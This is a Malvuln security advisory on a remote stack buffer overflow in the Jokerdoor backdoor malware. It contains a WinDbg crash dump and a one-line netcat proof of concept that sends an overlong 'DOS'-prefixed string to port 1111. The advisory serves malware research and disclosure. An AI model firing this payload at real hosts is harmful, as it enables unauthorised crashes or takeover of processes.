Exploit Backdoor.Win32.Jokerdoor Buffer Overflow

Name: Backdoor.Win32.Jokerdoor Buffer Overflow
Rating: 5 (220 reviews)
2021-11-05 | CVSS 0.9
## https://sploitus.com/exploit?id=PACKETSTORM:164786
Discovery / credits: Malvuln - malvuln.com (c) 2021  
Original source: https://malvuln.com/advisory/6ec85a641656f63f4de853468509d3e3.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln  
  
Threat: Backdoor.Win32.Jokerdoor  
Vulnerability: Remote Stack Buffer Overflow  
Description: The malware listens on TCP port 1111 and drops an randomly named executable E.g. xmutfeb.exe etc. Third party attackers who can reach an infected system can send a junk payload and trigger a classic stack buffer overflow overwriting the EBP, EIP registers and structured exception handler (SEH). When connecting you will get a "connected" server response, then we supply our payload as a parameter prefixed by "DOS" as running commands result in error.  
  
E.g.  
  
connected. 00 05 - November 4, 2021, Thursday, ver Legends 2.1  
DOS whoami  
DOS0224error running command.  
  
Type: PE32  
MD5: 6ec85a641656f63f4de853468509d3e3  
Vuln ID: MVID-2021-0390  
Dropped files: randomly named EXE  
ASLR: False  
DEP: False  
Safe SEH: True  
Disclosure: 11/04/2021  
  
Memory Dump:  
(1728.10d4): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=749feb0d edx=00000000 esi=00000000 edi=00000002  
eip=7770ed3c esp=0019ec30 ebp=0019ec70 iopl=0 nv up ei pl nz ac pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216  
ntdll!ZwWaitForMultipleObjects+0xc:  
7770ed3c c21400 ret 14h  
  
0:000> .ecxr  
eax=00010000 ebx=04253c0c ecx=749feb0d edx=00000000 esi=0042038a edi=02a30d24  
eip=41414141 esp=0019f2e4 ebp=41414141 iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202  
41414141 ?? ???  
0:000> !analyze -v  
*******************************************************************************  
* *  
* Exception Analysis *  
* *  
*******************************************************************************  
  
*** WARNING: Unable to verify checksum for xmutfeb.exe  
*** ERROR: Module load completed but symbols could not be loaded for xmutfeb.exe  
Failed calling InternetOpenUrl, GLE=12029  
  
FAULTING_IP:   
+14141  
41414141 ?? ???  
  
EXCEPTION_RECORD: 0019ee34 -- (.exr 0x19ee34)  
ExceptionAddress: 41414141  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000008  
NumberParameters: 2  
Parameter[0]: 00000000  
Parameter[1]: 41414141  
Attempt to read from address 41414141  
  
PROCESS_NAME: xmutfeb.exe  
  
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.  
  
EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.  
  
EXCEPTION_PARAMETER1: 00000015  
  
MOD_LIST: <ANALYSIS/>  
  
NTGLOBALFLAG: 0  
  
APPLICATION_VERIFIER_FLAGS: 0  
  
FAILED_INSTRUCTION_ADDRESS:   
+14141  
41414141 ?? ???  
  
CONTEXT: 0019ee84 -- (.cxr 0x19ee84)  
eax=00010000 ebx=04253c0c ecx=749feb0d edx=00000000 esi=0042038a edi=02a30d24  
eip=41414141 esp=0019f2e4 ebp=41414141 iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202  
41414141 ?? ???  
Resetting default scope  
  
READ_ADDRESS: 41414141   
  
FOLLOWUP_IP:   
xmutfeb+14141  
00414141 df3c24 fistp qword ptr [esp]  
  
FAULTING_THREAD: 000010d4  
  
BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_41414141  
  
PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_41414141  
  
DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_41414141  
  
IP_ON_HEAP: 41414141  
The fault address in not in any loaded module, please check your build's rebase  
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may  
contain the address if it were loaded.  
  
IP_IN_FREE_BLOCK: 41414141  
  
FRAME_ONE_INVALID: 1  
  
LAST_CONTROL_TRANSFER: from 41414141 to 41414141  
  
STACK_TEXT:   
WARNING: Frame IP not in any known module. Following frames may be wrong.  
0019f2e0 41414141 41414141 41414141 41414141 0x41414141  
0019f2e4 41414141 41414141 41414141 41414141 0x41414141  
0019f2e8 41414141 41414141 41414141 41414141 0x41414141  
0019f2ec 41414141 41414141 41414141 41414141 0x41414141  
0019f2f0 41414141 41414141 41414141 41414141 0x41414141  
0019f2f4 41414141 41414141 41414141 41414141 0x41414141  
0019f2f8 41414141 41414141 41414141 41414141 0x41414141  
0019f2fc 41414141 41414141 41414141 41414141 0x41414141  
0019f300 41414141 41414141 41414141 41414141 0x41414141  
0019f304 41414141 41414141 41414141 41414141 0x41414141  
0019f308 41414141 41414141 41414141 41414141 0x41414141  
0019f30c 41414141 41414141 41414141 41414141 0x41414141  
0019f310 41414141 41414141 41414141 41414141 0x41414141  
0019f314 41414141 41414141 41414141 41414141 0x41414141  
0019f318 41414141 41414141 41414141 41414141 0x41414141  
0019f31c 41414141 41414141 41414141 41414141 0x41414141  
0019f320 41414141 41414141 41414141 41414141 0x41414141  
0019f324 41414141 41414141 41414141 41414141 0x41414141  
0019f328 41414141 41414141 41414141 41414141 0x41414141  
0019f32c 41414141 41414141 41414141 41414141 0x41414141  
0019f330 41414141 41414141 41414141 41414141 0x41414141  
0019f334 41414141 41414141 41414141 41414141 0x41414141  
0019f338 41414141 41414141 41414141 41414141 0x41414141  
0019f33c 41414141 41414141 41414141 41414141 0x41414141  
0019f340 41414141 41414141 41414141 41414141 0x41414141  
0019f344 41414141 41414141 41414141 41414141 0x41414141  
0019f348 41414141 41414141 41414141 41414141 0x41414141  
0019f34c 41414141 41414141 41414141 41414141 0x41414141  
0019f350 41414141 41414141 41414141 41414141 0x41414141  
0019f354 41414141 41414141 41414141 41414141 0x41414141  
0019f358 41414141 41414141 41414141 41414141 0x41414141  
0019f35c 41414141 41414141 41414141 41414141 0x41414141  
0019f360 41414141 41414141 41414141 41414141 0x41414141  
0019f364 41414141 41414141 41414141 41414141 0x41414141  
0019f368 41414141 41414141 41414141 41414141 0x41414141  
0019f36c 41414141 41414141 41414141 41414141 0x41414141  
0019f370 41414141 41414141 41414141 41414141 0x41414141  
0019f374 41414141 41414141 41414141 41414141 0x41414141  
0019f378 41414141 41414141 41414141 41414141 0x41414141  
0019f37c 41414141 41414141 41414141 41414141 0x41414141  
0019f380 41414141 41414141 41414141 41414141 0x41414141  
0019f384 41414141 41414141 41414141 41414141 0x41414141  
0019f388 41414141 41414141 41414141 41414141 0x41414141  
0019f38c 41414141 41414141 41414141 41414141 0x41414141  
0019f390 41414141 41414141 41414141 41414141 0x41414141  
0019f394 41414141 41414141 41414141 41414141 0x41414141  
0019f398 41414141 41414141 41414141 41414141 0x41414141  
0019f39c 41414141 41414141 41414141 41414141 0x41414141  
0019f3a0 41414141 41414141 41414141 41414141 0x41414141  
0019f3a4 41414141 41414141 41414141 41414141 0x41414141  
0019f3a8 41414141 41414141 41414141 41414141 0x41414141  
0019f3ac 41414141 41414141 41414141 41414141 0x41414141  
0019f3b0 41414141 41414141 41414141 41414141 0x41414141  
0019f3b4 41414141 41414141 41414141 41414141 0x41414141  
0019f3b8 41414141 41414141 41414141 41414141 0x41414141  
0019f3bc 41414141 41414141 41414141 41414141 0x41414141  
0019f3c0 41414141 41414141 41414141 41414141 0x41414141  
0019f3c4 41414141 41414141 41414141 41414141 0x41414141  
0019f3c8 41414141 41414141 41414141 41414141 0x41414141  
0019f3cc 41414141 41414141 41414141 41414141 0x41414141  
0019f3d0 41414141 41414141 41414141 41414141 0x41414141  
0019f3d4 41414141 41414141 41414141 41414141 0x41414141  
0019f3d8 41414141 41414141 41414141 41414141 0x41414141  
0019f3dc 41414141 41414141 41414141 41414141 0x41414141  
0019f3e0 41414141 41414141 41414141 41414141 0x41414141  
0019f3e4 41414141 41414141 41414141 41414141 0x41414141  
0019f3e8 41414141 41414141 41414141 41414141 0x41414141  
0019f3ec 41414141 41414141 41414141 41414141 0x41414141  
0019f3f0 41414141 41414141 41414141 41414141 0x41414141  
0019f3f4 41414141 41414141 41414141 41414141 0x41414141  
0019f3f8 41414141 41414141 41414141 41414141 0x41414141  
0019f3fc 41414141 41414141 41414141 41414141 0x41414141  
0019f400 41414141 41414141 41414141 41414141 0x41414141  
0019f404 41414141 41414141 41414141 41414141 0x41414141  
0019f408 41414141 41414141 41414141 41414141 0x41414141  
0019f40c 41414141 41414141 41414141 41414141 0x41414141  
0019f410 41414141 41414141 41414141 41414141 0x41414141  
0019f414 41414141 41414141 41414141 41414141 0x41414141  
0019f418 41414141 41414141 41414141 41414141 0x41414141  
0019f41c 41414141 41414141 41414141 41414141 0x41414141  
0019f420 41414141 41414141 41414141 41414141 0x41414141  
0019f424 41414141 41414141 41414141 41414141 0x41414141  
0019f428 41414141 41414141 41414141 41414141 0x41414141  
0019f42c 41414141 41414141 41414141 41414141 0x41414141  
0019f430 41414141 41414141 41414141 41414141 0x41414141  
0019f434 41414141 41414141 41414141 41414141 0x41414141  
0019f438 41414141 41414141 41414141 41414141 0x41414141  
0019f43c 41414141 41414141 41414141 41414141 0x41414141  
0019f440 41414141 41414141 41414141 41414141 0x41414141  
0019f444 41414141 41414141 41414141 41414141 0x41414141  
0019f448 41414141 41414141 41414141 41414141 0x41414141  
0019f44c 41414141 41414141 41414141 41414141 0x41414141  
0019f450 41414141 41414141 41414141 41414141 0x41414141  
0019f454 41414141 41414141 41414141 41414141 0x41414141  
0019f458 41414141 41414141 41414141 41414141 0x41414141  
0019f45c 41414141 41414141 41414141 41414141 0x41414141  
0019f460 41414141 41414141 41414141 41414141 0x41414141  
0019f464 41414141 41414141 41414141 41414141 0x41414141  
0019f468 41414141 41414141 41414141 41414141 0x41414141  
0019f46c 41414141 41414141 41414141 41414141 0x41414141  
0019f470 41414141 41414141 41414141 41414141 0x41414141  
0019f474 41414141 41414141 41414141 41414141 0x41414141  
0019f478 41414141 41414141 41414141 41414141 0x41414141  
0019f47c 41414141 41414141 41414141 41414141 0x41414141  
0019f480 41414141 41414141 41414141 41414141 0x41414141  
0019f484 41414141 41414141 41414141 41414141 0x41414141  
0019f488 41414141 41414141 41414141 41414141 0x41414141  
0019f48c 41414141 41414141 41414141 41414141 0x41414141  
0019f490 41414141 41414141 41414141 41414141 0x41414141  
0019f494 41414141 41414141 41414141 41414141 0x41414141  
0019f498 41414141 41414141 41414141 41414141 0x41414141  
0019f49c 41414141 41414141 41414141 41414141 0x41414141  
0019f4a0 41414141 41414141 41414141 41414141 0x41414141  
0019f4a4 41414141 41414141 41414141 41414141 0x41414141  
0019f4a8 41414141 41414141 41414141 41414141 0x41414141  
0019f4ac 41414141 41414141 41414141 41414141 0x41414141  
0019f4b0 41414141 41414141 41414141 41414141 0x41414141  
0019f4b4 41414141 41414141 41414141 41414141 0x41414141  
0019f4b8 41414141 41414141 41414141 41414141 0x41414141  
0019f4bc 41414141 41414141 41414141 41414141 0x41414141  
0019f4c0 41414141 41414141 41414141 41414141 0x41414141  
0019f4c4 41414141 41414141 41414141 41414141 0x41414141  
0019f4c8 41414141 41414141 41414141 41414141 0x41414141  
0019f4cc 41414141 41414141 41414141 41414141 0x41414141  
0019f4d0 41414141 41414141 41414141 41414141 0x41414141  
0019f4d4 41414141 41414141 41414141 41414141 0x41414141  
0019f4d8 41414141 41414141 41414141 41414141 0x41414141  
0019f4dc 41414141 41414141 41414141 41414141 0x41414141  
0019f4e0 41414141 41414141 41414141 00414141 0x41414141  
0019f4e4 41414141 41414141 00414141 00000000 0x41414141  
0019f4e8 41414141 00414141 00000000 00000000 0x41414141  
0019f4ec 00414141 00000000 00000000 00000000 0x41414141  
0019f4f0 00000000 00000000 00000000 00000000 xmutfeb+0x14141  
  
  
SYMBOL_STACK_INDEX: 84  
  
SYMBOL_NAME: xmutfeb+14141  
  
FOLLOWUP_NAME: MachineOwner  
  
MODULE_NAME: xmutfeb  
  
IMAGE_NAME: xmutfeb.exe  
  
DEBUG_FLR_IMAGE_TIMESTAMP: 2a425e19  
  
STACK_COMMAND: .cxr 0x19ee84 ; kb  
  
FAILURE_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_41414141_c0000409_xmutfeb.exe!Unknown  
  
BUCKET_ID: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_41414141_MISSING_GSFRAME_BAD_IP_xmutfeb+14141  
  
0:000> !exchain  
0019ece8: ntdll!_except_handler4+0 (77716a50)  
CRT scope 0, func: ntdll!RtlReportExceptionHelper+251 (777557ad)  
0019f2e4: 41414141  
Invalid exception stack at 41414141  
  
  
Exploit/PoC:  
python -c "print('DOS'+'A'*804)" | nc64.exe x.x.x.x 1111  
connected. 00:05 - November 4, 2021, Thursday, ver: Legends 2.1  
  
  
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).